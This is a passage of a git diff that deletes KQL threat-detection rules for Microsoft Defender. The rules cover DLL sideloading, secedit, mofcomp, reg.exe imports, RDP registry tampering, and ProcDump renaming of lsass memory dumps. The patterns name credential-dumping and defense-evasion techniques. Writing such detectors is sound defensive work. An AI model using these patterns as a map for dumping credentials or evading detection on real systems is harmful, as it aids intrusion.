newline at end of file diff --git a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql b/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql deleted file mode 100644 index 83ffa4c6..00000000 --- a/Defense Evasion/Potential_SmadHook.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/06/01 -// Level: high -// Description: Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\SmadHook32c.dll" or FolderPath endswith "\\SmadHook64c.dll") and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files (x86)\\SMADAV\\SmadavProtect64.exe", "C:\\Program Files\\SMADAV\\SmadavProtect32.exe", "C:\\Program Files\\SMADAV\\SmadavProtect64.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\SMADAV\\" or FolderPath startswith "C:\\Program Files\\SMADAV\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql b/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql deleted file mode 100644 index fbd5181d..00000000 --- a/Defense Evasion/Potential_SolidPDFCreator.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/05/07 -// Level: medium -// Description: Detects potential DLL sideloading of "SolidPDFCreator.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\SolidPDFCreator.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\SolidDocuments\\SolidPDFCreator\\" or FolderPath startswith "C:\\Program Files\\SolidDocuments\\SolidPDFCreator\\") and InitiatingProcessFolderPath endswith "\\SolidPDFCreator.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql deleted file mode 100644 index e8d18e0e..00000000 --- a/Defense Evasion/Potential_Suspicious_Activity_Using_SeCEdit.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe -// Date: 2022/11/18 -// Level: medium -// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy -// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 -DeviceProcessEvents -| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql b/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql deleted file mode 100644 index 8c70124d..00000000 --- a/Defense Evasion/Potential_Suspicious_Mofcomp_Execution.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/12 -// Level: high -// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. -The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. -Attackers abuse this utility to install malicious MOF scripts - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql b/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql deleted file mode 100644 index d95b611c..00000000 --- a/Defense Evasion/Potential_Suspicious_Registry_File_Imported_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali -// Date: 2022/08/01 -// Level: medium -// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility -// Tags: attack.t1112, attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\") \ No newline at end of file diff --git a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql b/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql deleted file mode 100644 index 4bfe12e2..00000000 --- a/Defense Evasion/Potential_Suspicious_Windows_Feature_Enabled_-_ProcCreation.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/29 -// Level: medium -// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. -Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images - -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux") \ No newline at end of file diff --git a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql b/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql deleted file mode 100644 index 5269be55..00000000 --- a/Defense Evasion/Potential_SysInternals_ProcDump_Evasion.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/11 -// Level: high -// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_") \ No newline at end of file diff --git a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql b/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql deleted file mode 100644 index 1884165c..00000000 --- a/Defense Evasion/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/14 -// Level: high -// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql deleted file mode 100644 index 6cbd83b0..00000000 --- a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport -// Date: 2022/02/12 -// Level: high -// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values -// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112 -DeviceProcessEvents -| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql b/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql deleted file mode 100644 index b51227cf..00000000 --- a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql +++ /dev/null @@ -1,7 